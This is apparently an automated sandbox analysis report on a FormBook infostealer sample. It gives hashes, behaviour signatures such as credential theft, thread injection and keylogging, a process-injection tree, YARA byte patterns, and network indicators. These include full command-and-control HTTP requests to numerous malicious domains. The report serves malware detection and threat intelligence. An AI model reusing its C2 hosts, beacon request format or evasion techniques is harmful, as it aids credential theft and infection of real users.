Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
Analysis ID:1474004
MD5:13c0e83573fffeb4e951929815daf4e1
SHA1:9e1302aaabccb29247948ded46c92fca6d1fa2a0
SHA256:d37fe4f855049ecab456f1badc8f52afecf4d6ee3d7d43de84b7e0940dbb7399
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe" MD5: 13C0E83573FFFEB4E951929815DAF4E1)
    • svchost.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rULxYvbAFLatPN.exe (PID: 3300 cmdline: "C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • makecab.exe (PID: 7656 cmdline: "C:\Windows\SysWOW64\makecab.exe" MD5: 00824484BE0BCE2A430D7F43CD9BABA5)
          • rULxYvbAFLatPN.exe (PID: 1668 cmdline: "C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7772 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2e982:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x18011:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ab70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e0b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ParentProcessId: 7276, ParentProcessName: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ProcessId: 7292, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ParentProcessId: 7276, ParentProcessName: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ProcessId: 7292, ProcessName: svchost.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeReversingLabs: Detection: 36%
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeVirustotal: Detection: 29%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeJoe Sandbox ML: detected
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: makecab.pdbGCTL source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rULxYvbAFLatPN.exe, 00000005.00000000.1905502256.00000000002BE000.00000002.00000001.01000000.00000005.sdmp, rULxYvbAFLatPN.exe, 00000007.00000000.2054148696.00000000002BE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: makecab.pdb source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_008E4696
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008EC9C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EC93C FindFirstFileW,FindClose,0_2_008EC93C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF35D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EF65E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3A2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3D4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EBF27
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_0282BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_0282BEF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 4x nop then xor eax, eax6_2_028196C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 4x nop then pop edi6_2_0281E189
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 4x nop then mov ebx, 00000004h6_2_0459053F

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.rtpdewata4d-16.xyz
            Source: Joe Sandbox ViewIP Address: 203.161.41.205 203.161.41.205
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008F25E2
            Source: global trafficHTTP traffic detected: GET /esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.kundalisathi.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7ein/?UbV=/ihImCX+1rYe7Vz3Kk/QKb9OP755DF44RGQCiMJXBGw4by48MaukmXBDJs8Bc6H1E8vVem8tLNCMtrUfB/Ur9IMKSu+lAmmznonV11JSP5QMQGeoH+bhzTc=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.quixaclienti.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.mysticriverpath.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.bearclaw.botUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.focusonsocials.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pgto/?UbV=E7gJQqjSEHiqU9c9ksgsPN71gncF+WmU2fL1k5JHUJhFxTz44zYRR/afhYUOahGq3ZObWGCJogocVOMqr7fasKcgDvUaUtJUxsyY6DreonZJ8NGE1S91eUs=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.onlandtoy.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /snq6/?UbV=NSopt7KlKYWZPRkA7oY6sPxNomLcvlV5CqP+M6qmG+AJc6mQ/tzSijSCkZiEOKdTyH8X5nOn6MDLSgA5+pRURkcx9XBmg+R/K4xPlWUgSqmVkrADB3U9/MQ=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.quiluxx.topUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sq05/?UbV=4vYp4xDXBquPAaly5jqpyiz8vvwHg+w1s2ckl3sNoEBm9sSVWgAmrZHKJppZ7gqiYW0PudZtcTAAOkaLjZ+tbjDRBawb/1kyJrI7kWHcwz8aVyTLSwOG2zw=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.bb58cc.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.bestandpure.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.rtpdewata4d-16.xyzUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.itsjojosiwas.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.kera333.orgUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.lmsforsme.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fl6s/?UbV=A0xF7xRkJcHWMje5ph9HwG4I+mL/4fGguKCb0ROeX6+MB4i3E47mIUkdVM9rjjeu+d+SM2PwCOtJO5VtZmrS2xNTeXttUbHK0PGy4AIus9DMh4I9KsOxy7U=&Y4gp=mlltcrRxcL HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.3333711m14.shopUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: img.id = 'fb_' + imgId, img.src = 'https://www.facebook.com/tr/?' + params.join('&'), img.width = 1, img.height = 1, img.style = 'display:none;'; equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.kundalisathi.com
            Source: global trafficDNS traffic detected: DNS query: www.quests-galxe.com
            Source: global trafficDNS traffic detected: DNS query: www.quixaclienti.com
            Source: global trafficDNS traffic detected: DNS query: www.mysticriverpath.com
            Source: global trafficDNS traffic detected: DNS query: www.bearclaw.bot
            Source: global trafficDNS traffic detected: DNS query: www.focusonsocials.com
            Source: global trafficDNS traffic detected: DNS query: www.onlandtoy.com
            Source: global trafficDNS traffic detected: DNS query: www.quiluxx.top
            Source: global trafficDNS traffic detected: DNS query: www.bb58cc.com
            Source: global trafficDNS traffic detected: DNS query: www.bestandpure.com
            Source: global trafficDNS traffic detected: DNS query: www.rtpdewata4d-16.xyz
            Source: global trafficDNS traffic detected: DNS query: www.itsjojosiwas.com
            Source: global trafficDNS traffic detected: DNS query: www.kera333.org
            Source: global trafficDNS traffic detected: DNS query: www.lmsforsme.com
            Source: global trafficDNS traffic detected: DNS query: www.3333711m14.shop
            Source: global trafficDNS traffic detected: DNS query: www.iitaccounting.com
